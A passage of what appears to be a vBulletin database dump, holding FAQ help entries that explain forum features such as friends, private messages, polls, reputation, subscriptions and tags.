\r\n\r\nWhat is the \'What\'s Going On?\' box on the board home page?
\r\n\r\nOn the board home page you\'ll see a section at the bottom that tells you what\'s going on at the moment. It tells you things like the number of registered users online, the number of guests, and even things like birthdays, and forthcoming events.
\r\n\r\nCan I change the way the board looks?
\r\n\r\nYou may be able to change the styling of the board by using the style changer in the bottom left of the page. This lets you choose different skins which change the color scheme and appearance of the board. If this option does not appear, the board cannot be restyled.
', 'vbulletin', 'vBulletin Solutions', 1232372712, '3.8.1'),
(35052, -1, 'vb3_friends_contacts', 'faqtext', 'What is the difference between a friend and a contact?
\r\n\r\nA friendship is a mutual, two-way relationship between two users. It is initiated by one user and accepted by the other.
\r\n\r\nA contact is a one-way friendship. This could be where the other person does not accept the friendship, a friendship request is pending, or you do not wish to be friends at this time but want to show them as a contact only.
\r\n\r\nWhere is list of friends and contacts displayed?
\r\n\r\nYour friends and contacts are displayed on the \'Contacts and Friends \' page in your User CP . Your friends are also displayed in your profile page.
\r\n\r\nHow can I request a friend, accept a friend or break a friendship?
\r\n\r\nThere are two ways to request a friendship with someone.
\r\n\r\nThe easiest way is to view the profile page of the person you want to become friends with and click the \'Befriend\' link.
\r\n\r\nThe other way is to add the person to your contacts first. Then from your \'Contacts and Friends\' page ask to be their friend by checking the box next to their name labelled \'Friend\'. Next, save the page.
\r\n\r\nIf you know the username of the person you want to be friends with you can send a friend request using the box provided and clicking \'Add Friend\'.
\r\n\r\nTo accept a friend, go to your \'Contacts and Friends\' page. At the bottom of the page you will see a list of pending requests. Check the box for the requests you wish to accept then check the \'Accept\' button and save the changes. If you do not wish to be friends then select \'Reject\' instead.
\r\n\r\nBreaking a friendship can be done in three ways.
\r\n\r\n\r\nFrom your \'Contacts and Friends\' page, uncheck the box for friend for the particular person and save the changes. If you no longer wish them to be a contact either, uncheck both boxes for that person. \r\nIn your \'Profile Page\', click \'Friends\' and then click \'Break Friendship\' next to the user\'s name. \r\nIn the other person\'s profile, click \'Friends\' then find your username and click \'Break Friendship\'. \r\n ', 'vbulletin', 'vBulletin Solutions', 1207146244, '3.7.0 Release Candidate 3'),
(35053, -1, 'vb3_lost_passwords', 'faqtext', 'I forgot my password. What can I do?
\r\n\r\nIf you forget your password, you can click on the \'Forgotten Your Password \' link. This will appear on any page that requires you to fill in your password.
\r\n\r\nThis link brings up a page where you should enter your registered email address. An email will be sent to that address shortly, with instructions for resetting your password.
\r\n\r\nSince passwords are encrypted, there is no way to resend your original password. This option provides you with the ability to reset your password.
\r\n\r\nYou must be able to receive emails to your registered email address for this to work. You may need to check your spam filters and folder if you do not see this email in a few minutes.
', 'vbulletin', 'vBulletin Solutions', 1204551494, '3.7.0 Beta 6'),
(35054, -1, 'vb3_members_list', 'faqtext', 'What is the Members List?
\r\n\r\nThe members list shows the registered members of the board. Providing the administrator allows this, you can view the member list ordered alphabetically by username, by the date they joined, by the number of posts they have made or by reputation (?) .
\r\n\r\nTo view the members list, click on \'Member List \' on main navigation bar at the top of the page.
\r\n\r\nTo quickly find a particular member, click on the \'Search Members \' link and type a username (or partial username) into the box. For further search options - including searching based on join date, post count or home page - click on \'Advanced Search\' on the search menu.
\r\n\r\nAre all members listed?
\r\n\r\nSome members may not be on the list. The administrator has options over who is shown on the list. They may, for example, omit members who have not made many posts or who belong to certain user groups.
', 'vbulletin', 'vBulletin Solutions', 1207905934, '3.7.0 Release Candidate 4'),
(35055, -1, 'vb3_message_icons', 'faqtext', 'What are message icons?
\r\n\r\nMessage Icons, also known as Post Icons, are small icons that appear in the title of your post. If your post is the first in a thread, then they also display in the thread listings. If the board administrator has enabled these, they can be found below the message box on the \'New Post\' and \'New Thread\' pages. Simply select the icon that you wish to use and this will be displayed before your thread title.
\r\n\r\nWhat are thread prefixes?
\r\n\r\nThread Prefixes can be used to further identify your thread as containing a particular content in the forum. If your administrator has enabled these, you will see a box before the title box which contains a menu with the available prefixes for you to choose from.
', 'vbulletin', 'vBulletin Solutions', 1204553702, '3.7.0 Beta 6'),
(35056, -1, 'vb3_mods_admins', 'faqtext', 'What are moderators and administrators?
\r\n\r\nModerators oversee specific forums. They generally have the ability to edit and delete posts, move threads, and perform other actions. Becoming a moderator for a specific forum is usually rewarded to users who are particularly helpful and knowledgeable in the subject of the forum they are moderating.
\r\n\r\nAdministrators are the people who have overall control of everything that happens on the board. They oversee how the board is styled, what forums to create and how to organize them, what information to require from members and who to appoint as moderators.
', 'vbulletin', 'vBulletin Solutions', 1204559411, '3.7.0 Beta 6'),
(35057, -1, 'vb3_new_posts', 'faqtext', 'How can I see the latest posts?
\r\n\r\nThere are two ways to quickly view recently created or updated threads.
\r\n\r\nIf you are not logged in, the \'today\'s posts\' link will show a list of all threads that have been created or updated in the last 24 hours.
\r\n\r\nIf you are logged in, the \'Today\'s Posts\' link will change to \'New Posts\', which gives you a listing of all threads that have been created or updated since your last visit.
\r\n\r\nThe administrator can also set up the forums so that each thread you read is marked in the database. If this option is set, then new threads (or threads with new posts) will not be marked as read until you have actually read them.
\r\n\r\nThere is a built-in time limit to this, however, that will automatically mark all threads as \'read\' after a set number of day, whether you really have read them or not. The default setting is 10 days, but the administrator could make this higher or lower.
', 'vbulletin', 'vBulletin Solutions', 1204557689, '3.7.0 Beta 6'),
(35058, -1, 'vb3_notifications', 'faqtext', 'What are Your Notifications?
\r\n\r\nWhen you have logged into the board, a link to \'Your Notifications\' may be displayed in the \'Welcome\' box near the top of the forum. \'Your Notifications\' will show if you have any one of the following:
\r\n\r\n\r\nUnread Private Messages (?) \r\nUnread Profile Visitor Messages (?) \r\nProfile Visitor Messages Awaiting Approval \r\nIncoming Friend Requests (?) \r\nRequests to Join Your Social Groups (?) \r\nInvitations to Join Social Groups \r\nUnread Picture Comments (?) \r\nPicture Comments Awaiting Approval \r\n \r\n\r\nBy clicking on the \'Your Notifications\' link, you will be able to quickly see how many of each type you have received. Clicking on any of the links in the menu will take you to the relevant page within the User Control Panel or elsewhere in the system.
\r\n\r\nIf there are no notifications, then this link will be replaced by a link to \'Private Messages\' (?) .
', 'vbulletin', 'vBulletin Solutions', 1207905976, '3.7.0 Release Candidate 4'),
(35059, -1, 'vb3_other_settings', 'faqtext', 'What do the other settings do?
\r\n\r\nIn your User CP , there is a section under Settings & Options named \'Edit Options \'.
\r\n\r\n\r\n Login & Privacy: set your\r\n \r\n \'Invisible Mode\' - sets whether or not other members can see if you are online and what page you are viewing \r\n \'Show Reputation Level\' - shows your reputation level on posts if this option is enabled by the administrator \r\n \'Allow vCard Download\' - sets whether or not to allow other members to download a vCard containing your email address and username. \r\n \r\n \r\n \r\n Messaging & Notification - options include:\r\n \r\n \'Receive Email\' - whether or not you want to receive emails from other Members and administrators \r\n \'Default Thread Subscription Mode\' - how you want to be notified about new posts in threads to which you have subscribed \r\n \'Private Messaging\' - control how you want Private Messaging to work for your account \r\n \'Visitor Messaging\' - control how you want Visitor Messaging to work for your account \r\n \r\n \r\n \r\n Thread Display Options - these include:\r\n \r\n \'Visible Post Elements\' - whether or not you want to be able to see Signatures, Avatars and Images in posts \r\n \'Thread Display Mode\' - how you want to view threads by default (more info available here ) \r\n \'Number of Posts to Show Per Page\' \r\n \'Default Thread Age Cut Off\' - the time period for threads to be displayed - threads older than this age will be hidden \r\n \r\n \r\n \r\n Date & Time Options - these include:\r\n \r\n \'Time Zone\' - your local geographical time zone offset from GMT/UTC \r\n \'Start of the Week\' - for the Calendar. \r\n \r\n \r\n \r\n Miscellaneous Options include:\r\n \r\n \'Message Editor Interface\' - This option allows you choose what kind of editor you will use when posting messages. Your choices include a basic text-only editor, a standard editor with clickable formatting controls, or a full WYSIWYG (what you see is what you get) editor that will show your formatting as you type. \r\n \'Forum Style\' - only available if there is more than one style (or \'skin\') available and the administrator has enabled this selection \r\n \'Forum Language\' - only available if there is more than one Language enabled. This will change the language in which all controls and board messages will be shown. It will not translate members\' posts \r\n \r\n \r\n ', 'vbulletin', 'vBulletin Solutions', 1208778628, '3.7.0 Release Candidate 4'),
(35060, -1, 'vb3_polls', 'faqtext', 'You may notice that some threads on this forum also include a section where you can vote on an issue or question. These threads are called \'polls\'.
\r\n\r\nHow do I create a new poll?
\r\n\r\nWhen you post a new thread, you may also have the option to create a poll.
\r\n\r\nThis allows you to ask a question and specify a number of possible responses. Other members will then be able to vote for the response they wish, and the results of the voting will be displayed in the thread.
\r\n\r\nAn example poll might be:
\r\n\r\nWhat is your favorite color?
\r\n\r\n\r\nRed \r\nBlue \r\nYellow \r\nGreen \r\nSky-blue \r\nPink with yellow spots \r\n \r\n\r\nTo create a poll when you post a new thread, simply click the \'Yes, post a poll with this thread\' checkbox at the bottom of the page, and set the number of possible responses you want to include.
\r\n\r\nWhen you click the submit button, you will be taken to the poll creation page, where you can specify the question and the list of responses you want to include.
\r\n\r\nYou may also want to specify a time limit for the poll, so that (for example) it stays open for voting for only a week.
\r\n\r\nHow do I vote in a poll and view the results?
\r\n\r\nTo vote in a poll, simply select which option you want to vote for, and click the \'Vote!\' button. Sometime you can choose more than one option. You can see the current results for a poll before you vote by clicking the \'View Results\' link. Voting in a poll is entirely optional. You may vote for any of the available options, or cast no vote at all.
\r\n\r\nNote whether or not a poll is a public poll. If it is, any votes you cast will be attributable to you.
\r\n\r\nGenerally, once you have voted in a poll, you will not be able to change your vote later, so place your vote carefully!
', 'vbulletin', 'vBulletin Solutions', 1204552685, '3.7.0 Beta 6'),
(35061, -1, 'vb3_posting', 'faqtext', 'How do I format my posts and messages?
\r\n\r\nWhen posting messages you may wish to include some formatting such as bold text , italic text and underlined text .
\r\n\r\nAdding formatting to your post can be done in two ways:
\r\n\r\n\r\nUsing clickable controls similar to those found in most word processors \r\nTyping formatting commands in BB code \r\n \r\n\r\nClickable controls are available in the Standard and Enhanced WYSIWYG (What You See Is What You Get) editors. The difference between these is that the standard editor will show the BB code in your message and be processed when it is displayed. The enhanced WYSIWYG editor will show your message as it will be displayed while you are typing.
\r\n\r\nTo use these, simply click the button, for example the B (bold) button and then type to get bold text. Click the button again to stop using that formatting. You can also highlight text that you have already typed then click the formatting button to format existing text.
\r\n\r\nBB code is a special set of codes similar to HTML that can be used in posts to the board. To see the full list of BB code tags that can be used on this site and examples of their use, click here .
', 'vbulletin', 'vBulletin Solutions', 1206965663, '3.7.0 Release Candidate 2'),
(35062, -1, 'vb3_private_messages', 'faqtext', 'If the administrator has enabled the Private Messaging system, registered members may send each other private messages.
\r\n\r\nHow do I send Private Messages?
\r\n\r\nPrivate messages work a little like email, but are limited to registered members of this forum. You may be able to include BB code, smilies and images in private messages that you send.
\r\n\r\nYou may send a private message to a member of this forum by clicking the \'Send A Private Message \' link in the private messaging section of your user control panel (more info ), or by clicking the \'Send a Private Message\' link in the drop down menu that appears in a member\'s posts when you click on their username.
\r\n\r\nWhen you send a message, you have the option to save a copy of it in your \'Sent Items\' folder.
\r\n\r\nHow do I work with Private Message Folders?
\r\n\r\nBy default, you will have two folders in your private message area. These are the \'Inbox\' and the \'Sent\' Items folders.
\r\n\r\nThe \'Inbox \' folder contains any new messages you receive. It allows you to view all the messages you have received, along with the name of the person who sent it, and the date and time it was sent.
\r\n\r\nThe \'Sent Items \' folder contains a copy of any messages that you have sent, where you have specified that you wish to keep a copy for future reference.
\r\n\r\nYou can create additional folders for your messages by clicking the \'Edit Folders \' link.
\r\n\r\nEach folder has a set of message controls which allow you to select messages, then either move them to one of your custom folders, or delete them. Once you have selected your messages, you can choose the following options in the \'Selected Messages\' box at the bottom of the list:
\r\n\r\n\r\nMove to Folder \r\nDelete \r\nMark as Read \r\nMark as Unread \r\nDownload as XML \r\nDownload as CSV \r\nDownload as TEXT \r\n \r\n\r\nYou will need to periodically delete old messages, as the administrator has probably set a limit to the number of private messages you can have in your folders. If you exceed this number, you will not be able to send or receive new messages until you delete some old ones.
\r\n\r\nIf you would like to keep a record of your messages before you delete them, you can use any of the \'Download as..\' options listed above to take a copy and store them on your own computer.
\r\n\r\nWhenever you read a message, you will have the option to reply or forward it to another member of the forum. You may also have the ability to forward that message to multiple members of your contact list.
\r\n\r\nHow do I track messages?
\r\n\r\nWhen you send a new private message, you may have the option to request a read-receipt. This lets you check whether or not a message has been read by its recipient. To do this, go to the \'Message Tracking \' page.
\r\n\r\nThis page is divided into two sections: unread and read messages.
\r\n\r\nThe unread messages section shows all messages that you have sent with a read-receipt request, that have not yet been read by their recipient.
\r\n\r\nThe read messages section shows all messages you have sent with a receipt request that have been read and acknowledged by their recipient. The time that the message was read is also shown.
\r\n\r\nYou may choose to end the tracking on any message you choose by selecting it and clicking the \'End Tracking\' button.
\r\n\r\nWhen you receive a message with a read-receipt request, you may have the option to read the message while denying the read-receipt request. To do this, simply click the \'Deny Receipt\' link rather than the title of the message, if it appears.
', 'vbulletin', 'vBulletin Solutions', 1232372783, '3.8.1'),
(35063, -1, 'vb3_profile_custom', 'faqtext', 'How do I customize my profile page?
\r\n\r\nYou may be able to edit the design and styling of your public profile page (if this is enabled by the board administrator) via the \'Customize Profile \' section within the User CP . You can adjust the color scheme, fonts, borders and layout of elements on the page.
\r\n\r\nYou can also use images as background for various sections of you profile. First you will need to upload the background images to an album you have created (?) . Background images can be sourced only from albums defined as public, or \'profile\' type. Images in private albums cannot be used.
', 'vbulletin', 'vBulletin Solutions', 1232372827, '3.8.1'),
(35064, -1, 'vb3_public_profile', 'faqtext', 'What is the Public Profile Page?
\r\n\r\nEvery member has a publicly viewable profile page. This page includes information provided by the member, either during the registration process or later on via the User Control Panel.
\r\n\r\nThere are a number of ways to view a member\'s profile. Whenever you see a member\'s name, clicking on it will usually take you to view their profile page.
\r\n\r\nThe members list allows you to browse all registered members, and quickly click through to public profiles.
\r\n\r\nWhen logged in, you can also view your own public profile by logging into the forums and clicking on your username shown in the header at the top of the page.
\r\n\r\nYou can also go straight to a profile if you know the username of the member by typing in the following into your web browser: http://www.example.com/member.php?username=<username of the member>
\r\n\r\nWhat\'s on the Public Profile Page?
\r\n\r\nThe public profile lists information about the member under the \'About Me\' tab. It also includes statistical information, such as the number of posts they have made and their registration date. This information is shown under the \'Statistics\' tab.
\r\n\r\nOther information includes a list of Friends (?) , their profile picture (if set by the member), and a list of members who have recently visited the profile page.
\r\n\r\nA list of the members\' albums (?) and social group (?) memberships are also shown.
\r\n\r\nWhat are Visitor Messages?
\r\n\r\nVisitor messages are publicly viewable messages posted on member profile pages. To post a message, click on the \'Visitor messages\' tab, and use the form at the top of the section. You will only be able to use certain formatting in these messages, as described underneath the edit box. This message will be viewable by all visitors to this profile, including guest users and search engine robots if the administrator has allowed this. To communicate privately with a member, send a Private Message instead.
\r\n\r\nVisitor messages can be edited or deleted by site moderators or the member who owns the profile. If you see a visitor message that is not appropriate, you can alert the moderators by clicking on the \'Report\' link. The \'View Conversation\' link allows you to view all visitor messages between the member and the owner of the profile.
', 'vbulletin', 'vBulletin Solutions', 1232372889, '3.8.1'),
(35065, -1, 'vb3_quick_links', 'faqtext', 'What is the Quick Links menu?
\r\n\r\nThe navigation bar at the top of each page has several helpful links. One of them is a dropdown menu called Quick Links. (It appears only to registered members who are logged in). Clicking it once with the mouse will make it drop down and show the following options:
\r\n\r\n\r\n Quick Links \r\n \r\n Today\'s Posts (shows posts created in the past 24 hours) \r\n Mark Forums Read (marks all the threads and posts as read for your session - this is a shortcut alternative to actually reading the threads and posts) \r\n Open Contacts Popup (opens a new window with a list of all your contacts) \r\n \r\n \r\n \r\n Networking \r\n \r\n Contacts and Friends (a page from where you can manage your contacts and friends) \r\n Social Groups (where you can manage your social groups) \r\n Pictures and Albums (where you can manage your pictures and albums) \r\n \r\n \r\n \r\n User Control Panel (clicking this takes you to your personal user control panel) \r\n \r\n Edit Signature (edit your personal signature that appears below posts) \r\n Edit Your Details (edit your personal profile details) \r\n Edit Options (manage your community settings) \r\n \r\n \r\n \r\n Miscellaneous \r\n \r\n Private Messages (manage your private messages, read your inbox, create new messages, etc) \r\n Subscribed Threads (get an overview of your free subscriptions and options to manage them) \r\n Your Profile (loads your social profile) \r\n Who\'s Online (see which users who are currently online on the board and what they are doing) \r\n \r\n \r\n ', 'vbulletin', 'vBulletin Solutions', 1207917146, '3.7.0 Release Candidate 4'),
(35066, -1, 'vb3_rating_threads', 'faqtext', 'What are ratings?
\r\n\r\nThe forums allow you to rate threads between 1 star (terrible) and 5 stars (excellent). Once enough votes are cast for a thread, stars will appear next to its name in the listings. These show the average vote, and can be an easy way to see which threads are worth reading if you are on a busy forum.
\r\n\r\nOn the forum viewing page you can also arrange threads by rating, with either the highest or lowest at the top.
\r\n\r\nIt therefore makes sense to rate threads because it helps all users. To do this, click on the \'rate thread\' link at the top of the thread viewing page. Choose the number of stars you feel best represents the quality of the thread. You may or may not be able to change your choice of rating at a later date.
', 'vbulletin', 'vBulletin Solutions', 1204551428, '3.7.0 Beta 6'),
(35067, -1, 'vb3_reading_posting', 'faqtext', '', 'vbulletin', 'vBulletin Solutions', 1204552547, '3.7.0 Beta 6'),
(35068, -1, 'vb3_register', 'faqtext', 'The administrator will probably require you to register in order to use all the features of the forum. Being registered gives you an identity on the board, a fixed username on all messages you post and an online public profile.
\r\n\r\nRegistration is free (unless otherwise specified), and offers an extended range of features, including:
\r\n\r\n\r\nPosting new threads \r\nReplying to other peoples\' threads \r\nEditing your posts \r\nReceiving email notification of replies to posts and threads you specify \r\nSending private messages to other members \r\nCreating albums of pictures and comment on others\' pictures \r\nAdding events to the forum calendar \r\nSetting up a \'contact list\' to quickly see which of your friends are online. \r\n \r\n\r\nHow do I register?
\r\n\r\nYou register by clicking on the \'Register \' link near the top of the page. You will be asked to choose a user name, password and enter a valid email address. In addition there will be some other fields to which you will be invited to respond. Some will be mandatory while others are optional. Once this is complete you will either be fully registered, or in some cases you may have to click on a link in an \'activation email\' sent to your email address. Once you have done this you will be registered.
\r\n\r\nNote that entering your email address will not leave you open to \'spam\', as you can choose to hide it from other board users. You\'ll probably be able to allow other registered users to contact you via email, but the system won\'t display your email address to them unless you give permission.
\r\n\r\nIf you are under the age of 13, the administrator may require that a parent or guardian provide consent before allowing you to complete the registration process. More information about this is available during the registration process.
', 'vbulletin', 'vBulletin Solutions', 1233227232, '3.8.2'),
(35069, -1, 'vb3_replying', 'faqtext', 'On some boards you might be able to post and reply as a guest user. But most communities require registration.
\r\n\r\nAs a registered user you can go to a forum on a board where you have permission to view threads and leave replies. To reply you have a few options. You can click on the \'Post Reply\' button and add a new post to the end of the thread. Alternatively, you can leave a quick reply in a quick editor box listed below the posts in the thread.
\r\n\r\nWhen using \'Quick Reply\' you can choose to quote a particular post if you are replying to something someone wrote. You may need to click the quick reply button in a post to activate the quick reply box before you can type into it.
\r\n\r\nIf you want to post replies to multiple posts you can select them by clicking the multi quote button . This button will change to indicate that you\'ve selected it. Clicking post reply will then bring you to the full editor with all the posts quoted.
', 'vbulletin', 'vBulletin Solutions', 1208717872, '3.7.0 Release Candidate 4'),
(35070, -1, 'vb3_reputation', 'faqtext', 'What is reputation?
\r\n\r\nReputation is a way of rating users depending on the quality of their posts. If the administrators have enabled reputation, then the reputation icon will be visible in posts.
\r\n\r\nReputation may be positive , negative or neutral . Negative reputation may only be given if the administrator has enabled this. Neutral reputation is only given when the person giving reputation does not meet the criteria set by the administrator to affect someone else\'s reputation.
\r\n\r\nHow do I give reputation?
\r\n\r\nTo give reputation, click on the reputation icon in the relevant post. This will reveal a form to complete with the reputation type and the reason for giving the reputation. If negative reputation is disabled then it will not be displayed in this form. You may not give reputation for the same post twice.
\r\n\r\nHow do I know what reputation I have received?
\r\n\r\nYou can view the reputation that you have received in your User CP (User Control Panel) where it is displayed at the bottom of the User CP page. Here you will see the latest reputation that you have received and whether this is positive, negative or neutral. Your total reputation will be shown as series of reputation indicators in your posts and profile. The more positive your reputation, the more positive icons will be shown. The more negative your reputation the more negative icons will be shown.
\r\n\r\nHow much reputation is given? What is reputation power?
\r\n\r\nIf the administrator has enabled this, the amount of reputation that each user will give (or take away if negative) is shown in the user\'s posts as \'Reputation Power\'. The value of the reputation power is determined by the administrator and may increase over time depending on the settings they have applied.
\r\n\r\nWhat if I don\'t want anyone to see my reputation?
\r\n\r\nYou can disable the display of your reputation by going to your User CP and selecting Edit Options. On this page you will find a check box labelled \'Show Your Reputation Level\'. Un-checking this box will remove the display of your reputation and replace it with the Reputation Disabled icon. You can still give and receive reputation while your reputation display is disabled.
', 'vbulletin', 'vBulletin Solutions', 1207146368, '3.7.0 Release Candidate 3'),
(35071, -1, 'vb3_rss_podcasting', 'faqtext', 'Can I use RSS to keep up with new posts?
\r\n\r\nIf the administrator has enabled RSS syndication, this lets you view newly created threads in guest-viewable forums without visiting the board.
\r\n\r\nThe feeds are currently provided in two formats, RSS and RSS v2.
\r\n\r\nMost modern browsers have facilities for reading RSS feeds and will automatically detect the availability of feeds on bulletin board pages.
\r\n\r\nHow do I listen to podcasts?
\r\n\r\nA podcast is a means of distributing audio files (such as .mp3s) over the internet. They can be played on a wide range of media players and computers. If the board administrator has enabled this function, then you may sometimes see links to podcasts within threads.
\r\n\r\nPodcasts contained within threads are only accessible using RSS feeds.
', 'vbulletin', 'vBulletin Solutions', 1204557897, '3.7.0 Beta 6'),
(35072, -1, 'vb3_search', 'faqtext', 'How do I search for something?
\r\n\r\nTo quickly find a thread or post of interest anywhere on the bulletin board, click on the \'Search\' link in the navigation bar at the top of most forum pages. Then, type in the keyword or phrase you wish to search for, and select either \'Show Threads\' or \'Show Posts\' to view the results. By selecting posts, you will be shown only the actual post in which the search word appears.
\r\n\r\nFor more control over the search, select \'Advanced Search\' from the drop-down box. The advanced search page allows you to restrict your search to individual forums, find posts or threads by user, or return results based on tags (?) . There are also options to find posts from a certain date, or threads with a certain number of replies.
\r\n\r\nHow do I search a specific forum or thread?
\r\n\r\nIf you are browsing a forum, you can quickly search for a thread or post within it by clicking on the \'Search this forum\' link near the top of the page (it\'s above the list of threads). You can also search for individual posts within a thread by clicking on the \'Search this Thread\' link at the top of any thread view page.
', 'vbulletin', 'vBulletin Solutions', 1232372928, '3.8.1'),
(35073, -1, 'vb3_signatures_avatars', 'faqtext', 'What are signatures?
\r\n\r\n\'Signatures\' contain information that you want to include at the bottom of all your posts. This might include pictures, links to your site(s), quotes, etc.
\r\n\r\nWhat are avatars?
\r\n\r\nAvatars are small images that people use to identify or distinguish themselves to other forum members. In some cases the administrator will not allow avatars or only allow them for specific members. The administrator can also provide some stock avatars people can use, or they can allow members to upload their own custom avatars from their own computers. These avatars will be displayed as part of the user info in posts, as well as in the public profile.
\r\n\r\nFor more information about avatars, please click here .
\r\n\r\nWhat are profile pictures?
\r\n\r\nProfile Pictures are photos members can upload that will display in their public member profile. This option may or may not be enabled by the administrator.
\r\n\r\nHow do I set signatures, avatars and profile pictures?
\r\n\r\nYou can set and change your signature, avatar and profile picture in the User Control Panel (providing the administrator has made these options available).
\r\n\r\nFor signatures, click on \'Edit Signature \' under the \'Settings and Options\' area of the navigation bar within the User CP.
\r\n\r\nTo select an existing or upload a new avatar, click on \'Edit Avatar \'.
\r\n\r\nTo upload a profile picture, click on \'Edit Profile Picture \' in the \'Your Profile\' section.
', 'vbulletin', 'vBulletin Solutions', 1204553831, '3.7.0 Beta 6'),
(35074, -1, 'vb3_smilies', 'faqtext', 'What are smilies?
\r\n\r\nSmilies are icons that can be used in your posts to express emotions or feelings. You might wish to use these to show that you are happy, sad, joking, or embarrassed. For example, if you are telling a joke or being sarcastic you may wish to add a wink instead of writing \'this is a joke\'.
\r\n\r\nThe basic smilies are the same as what you would find on any instant messenger system. They are made up of a combination of characters which often show the basis of the resulting image. For example, :) is converted to a smiley face and :( to a sad face or frown. Tilt your head to the left to see this in action as these consist of two eyes and a mouth either smiling or frowning.
\r\n\r\nHow do I add smilies?
\r\n\r\nSome smilies can be accessed from the \'New Post\' or \'New Thread\' pages if your administrator has enabled this function. Clicking them will automatically insert them into your message. You can also type the character combinations for the smilies directly. A full list of the smilies and their character combinations used on this forum can be found here .
\r\n\r\nOn occasions, you may want to prevent the text in your message being converted into smilies. You will see a checkbox which you can select when you make a new post, which will allow you to \'Disable Smilies\'.
', 'vbulletin', 'vBulletin Solutions', 1207905787, '3.7.0 Release Candidate 4'),
(35075, -1, 'vb3_social_groups', 'faqtext', 'What is a social group?
\r\n\r\nA social group is a group of people usually with a particular interest or something else in common. It provides a way of communicating between members as well as sharing photos or other images.
\r\n\r\nYou can get to the list through \'Group Memberships\' section on your public profile (?) .
\r\n\r\nThe Social Groups list page displays all groups that have been created. You can list the groups by the number of members, messages or pictures, the group name, when the group was created or by the date of the most recent message posted. You can use the controls provided to search for a group.
\r\n\r\nHow do I join a group?
\r\n\r\nTo join a group, click the group title then click \'Join Group\'. When you have joined a group, its name will be shown in your public profile. You must be a logged-in, registered member to join groups.
\r\n\r\nCan I create my own social group?
\r\n\r\nAs a registered member, you can create your own social group (providing the administrator allows this). Go to the groups page and click \'Create A New Group\'. Complete the title and description for your group then select the type. There are three types of groups:
\r\n\r\n\r\n Public - open to everyone. There is no restriction on who can join or who can post messages to it \r\n Invite Only - require an invitation to be sent to join them. Invitations can only be sent by the group creator or forum moderators and administrators. Invitations are sent by clicking \'Pending & Invited Members\' at the bottom of the page for that individual group \r\n Moderated - open to everyone to join but messages need to be moderated before they will appear. They are moderated by the group creator and the site moderators and administrators \r\n ', 'vbulletin', 'vBulletin Solutions', 1232372947, '3.8.1'),
(35076, -1, 'vb3_subscriptions', 'faqtext', 'What are subscriptions?
\r\n\r\nSubscriptions are a way of keeping track of different threads or forums. You can choose how you are notified about updates - for example by having them listed in your User CP and receiving email updates for each one.
\r\n\r\nHow do I subscribe to a thread or forum?
\r\n\r\nTo subscribe to a forum, click the \'Forum Tools\' link above the list of threads then select \'Subscribe to Forum\'. You will then have the option to choose the subscription mode for this forum. If the forum that you are subscribing to has any child forums (forums within a forum) then your subscription will be extended to these automatically.
\r\n\r\nTo subscribe to a thread, click the \'Thread Tools\' link at the top of the list of posts then click \'Subscribe to Thread\'. You can then choose the subscription mode that you wish to use for that thread.
\r\n\r\nWhat subscription modes are available?
\r\n\r\nThere are a number of different forum subscription modes available.
\r\n\r\n\r\nNo Email Notification - lists the subscription in your User CP only. You do not receive any notifications about new posts or threads in the forum. \r\nDaily Email Notification - sends one email a day with the new and updated threads in the forum and any sub-forums. If there are no new or updated threads in the forum or its sub-forums then you will not receive an email. \r\nWeekly Email Notification - sends one email per week in the same way as the Daily Email Notification. \r\n \r\n\r\nThread Subscriptions have the same options as forum subscriptions with the following additional option:
\r\n\r\n\r\nInstant Email Notification - sends an email as soon as a new post is added to the thread. This is not sent for every reply and will only be sent once until you revisit the forums. \r\n \r\n\r\nHow do I manage Subscriptions and Folders?
\r\n\r\nThread subscriptions can be sorted into folders for easy management. You can create as many folders as you wish by going to \'Edit Folders \' in the \'Subscribed Threads\' section of your User CP. To add a new folder, enter the folder name into one of the blank boxes and save the page. To delete a folder, delete the folder name. Editing a folder is done by simply editing the folder name in the list.
\r\n\r\nYou can also manage your individual subscriptions by clicking \'List Subscriptions \' under \'Subscribed Threads\' in your User CP. Here you can select which subscriptions you wish to manage and delete them, move them to another folder, or change their subscription type.
\r\n\r\nForum subscriptions are not managed through the List Subscriptions page and are shown on the User CP page where they contain the option to unsubscribe from the forum.
', 'vbulletin', 'vBulletin Solutions', 1207146385, '3.7.0 Release Candidate 3'),
(35077, -1, 'vb3_tags', 'faqtext', 'What are tags?
\r\n\r\nTags are a useful way to search for threads with similar subject matter and content. This complements the normal search system, which searches only for certain words or phrases and/or posts by specific users.
\r\n\r\nTo use tags, you add words or phrases to threads to help describe the content. For instance, if the subject matter is \'photography\' then you can add the tag \'photography\' to the tag list. But you could also add tags like \'digital image\', and \'camera\' (depending, of course, on the nature of the thread).
\r\n\r\nThis will categorize this thread with all other threads that have matching tags, whether or not they have the word \'photography\' in them.
\r\n\r\nWho adds the tags?
\r\n\r\nTags are initially added to threads by the user who started the thread. Other users may also be able to add and remove tags.
\r\n\r\nHow do I use tags?
\r\n\r\nTags are displayed in a box near the bottom of a thread page. Clicking on a tag will allow you to view other threads that have the same tag - and which may be related. Clicking on the word \'Tags\' in the top of the box will take you to an overview page with a \'tag cloud.\'
\r\n\r\nThis cloud allows you to see which tags are the most popular - the larger the word, the more times it has been used on threads within the board. There is also another tag cloud on the advanced search page that shows you the tags that have been searched for (or clicked on) the most.
', 'vbulletin', 'vBulletin Solutions', 1215708585, '3.8.0 Alpha 1'),
(35078, -1, 'vb3_thread_display', 'faqtext', 'Can I change the order of posts?
\r\n\r\nYou have a choice over how you view threads. When you\'re in a thread, look at the top bar. On the right hand side you\'ll see \'Display Mode\'. Click on this and it lets you change how posts are ordered.
\r\n\r\nYou have three choices:
\r\n\r\nLinear Mode - posts are displayed chronologically, usually from oldest to newest. Posts are shown in a flat mode so that many posts can be viewed simultaneously. It is possible to change the ordering by changing your preferences in the User CP
\r\n\r\nThreaded Mode - a tree is shown along with every post. This shows you the relationship each post has to the others. It\'s easy to see who responded to whom. Only one post is shown at a time. By clicking on a single post in the post tree, the page will show that post and all posts made in response to it.
\r\n\r\nHybrid Mode - This is a mixture of the linear and threaded modes. The post tree is displayed as in the threaded mode, but many posts are shown at the same time as in the linear modes.
', 'vbulletin', 'vBulletin Solutions', 1248797392, '3.8.3'),
(35079, -1, 'vb3_thread_tools', 'faqtext', 'What are thread tools?
\r\n\r\nAt the top of each thread, there is a link called \'Thread Tools\'. By clicking on this link, a menu will appear with a number of options:
